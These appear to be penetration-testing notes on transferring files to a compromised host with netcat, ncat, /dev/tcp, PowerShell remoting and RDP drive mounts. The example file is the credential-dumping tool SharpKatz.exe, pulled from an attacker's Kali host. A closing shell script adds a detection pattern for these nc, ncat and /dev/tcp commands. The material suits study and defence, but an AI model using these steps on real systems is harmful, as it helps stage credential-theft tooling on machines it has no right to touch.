# File Transfers with Netcat and Ncat

## Listener on compromised target

- set up listener on compromised target

```bash
#example using netcat
nc -lp 8000 > SharpKatz.exe

#example using ncat
ncat -lp 8000 --recv-only > SharpKatz.exe
```

- send file from Kali host to listener on target

```bash
wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe #download file

#example using netcat to send file to listener
nc -q 0 <target_ip> 8000 < SharpKatz.exe #-q 0 closes connection once it finishes

#example using ncat to send file to listener
ncat --send-only <target_ip> 8000 < SharpKatz.exe
```

## Send file from Kali host as input to nc/ncat

- send file as input to nc/ncat on Kali host

```bash
#example using netcat to send file
sudo nc -lp 443 -q 0 < SharpKatz.exe

#example using ncat to send file
sudo ncat -lp 443 --send-only < SharpKatz.exe
```

- receive file on compromised target

```bash
#example using netcat to receive file
nc <kali_host_ip> 443 > SharpKatz.exe

#example using ncat to receive file
ncat <kali_host_ip> 443 --recv-only > SharpKatz.exe

#example using /dev/tcp/ to receive file
cat < /dev/tcp/<kali_host_ip>/<port> > SharpKatz.exe
```

# File Transfers with PowerShell Session

- PowerShell remoting allows one to execute scripts or commands on a remote computer using a PowerShell session
- administrative access or membership in the Remote Management Users group is required
- typical ports: TCP/5985 for the HTTP listener and TCP/5986 for the HTTPS listener

```powershell
whoami
hostname
Test-NetConnection -ComputerName DATABASE01 -Port 5985 #confirm winrm port TCP/5985 is open on DATABASE01
```

```powershell
#create a powershell remoting session to DATABASE01
$Session = New-PSSession -ComputerName DATABASE01

#copy file from localhost to DATABASE01 Session
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop

#copy file from DATABASE01 Session to localhost
Copy-Item -Path "C:\Users\Administrator\Desktop\target.txt" -Destination C:\ -FromSession $Session
```

# File Transfers with RDP

```bash
#mount a local resource on target RDP server
rdesktop <target_ip> -d HTB -u administrator -p '<password>' -r disk:linux='/home/user/rdesktop' #mount linux folder using rdesktop
xfreerdp /v:<target_ip> /d:HTB /u:administrator /p:'<password>' /drive:linux,/home/user/rdesktop #mount linux folder using xfreerdp
```

- `mstsc.exe` is a native Windows remote desktop client
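
On the detection side, the nc/ncat and `/dev/tcp/` transfers in the first section leave recognisable command lines in shell history and process-creation logs. The script below is an added example, not part of the original notes: the function names, labels and sample lines are constructed for illustration, and the addresses come from documentation ranges.

```shell
#!/bin/sh
# Added example: label recorded command lines that match the nc/ncat and
# /dev/tcp transfer patterns shown on this page. All names are illustrative.

# True when string $1 matches extended regex $2.
matches() { printf '%s\n' "$1" | grep -Eq -e "$2"; }

# Print one label for a single command line.
classify_cmdline() {
  cmd=$1
  # nc / ncat / netcat as a whole word, optionally behind a path or sudo
  nc_re='(^|[[:space:]/])(nc|ncat|netcat)([[:space:]]|$)'
  # short option cluster containing "l" (-l, -lp, -nlvp) or --listen
  listen_re='[[:space:]](-[a-zA-Z]*l[a-zA-Z]*|--listen)([[:space:]]|$)'
  if matches "$cmd" '/dev/tcp/[^[:space:]/]+/[0-9]+'; then
    echo dev-tcp-transfer
  elif ! matches "$cmd" "$nc_re"; then
    echo none
  elif matches "$cmd" '--(send|recv)-only'; then
    echo ncat-one-way-transfer
  elif matches "$cmd" "$listen_re"; then
    echo nc-listener
  else
    echo nc-client
  fi
}

# Read command lines on stdin; print "label<TAB>line" for each flagged one.
scan_cmdlines() {
  while IFS= read -r line; do
    label=$(classify_cmdline "$line")
    [ "$label" = none ] || printf '%s\t%s\n' "$label" "$line"
  done
}

# Constructed sample input; the rsync line is a benign control.
sample_cmdlines() {
cat <<'EOF'
nc -lp 8000
ncat -lp 8000 --recv-only
nc -q 0 192.0.2.10 8000
sudo ncat -lp 443 --send-only
bash -c 'cat < /dev/tcp/192.0.2.20/443 > out.bin'
rsync -l /srv/data backup:/srv/data
EOF
}

sample_cmdlines | scan_cmdlines
```

Shell redirections such as `> SharpKatz.exe` are not part of a process's argument list, so the rules key on the listener and one-way flags rather than on the file name.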